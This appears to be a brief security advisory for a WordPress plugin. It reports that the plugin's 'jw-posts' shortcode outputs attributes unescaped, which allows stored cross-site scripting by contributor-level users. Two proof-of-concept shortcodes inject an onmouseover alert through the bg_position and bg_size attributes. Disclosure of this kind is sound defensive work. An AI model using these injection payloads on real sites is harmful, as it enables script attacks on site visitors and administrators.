The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks
[jw-posts show_image='yes' show_image_as='background' bg_position='" onmouseover="alert(/XSS/)"']
[jw-posts show_image='yes' show_image_as='background' bg_size='"onmouseover="alert(/XSS/)//']
Note: For the exploit, at least one of the posts must have a thumbnail image.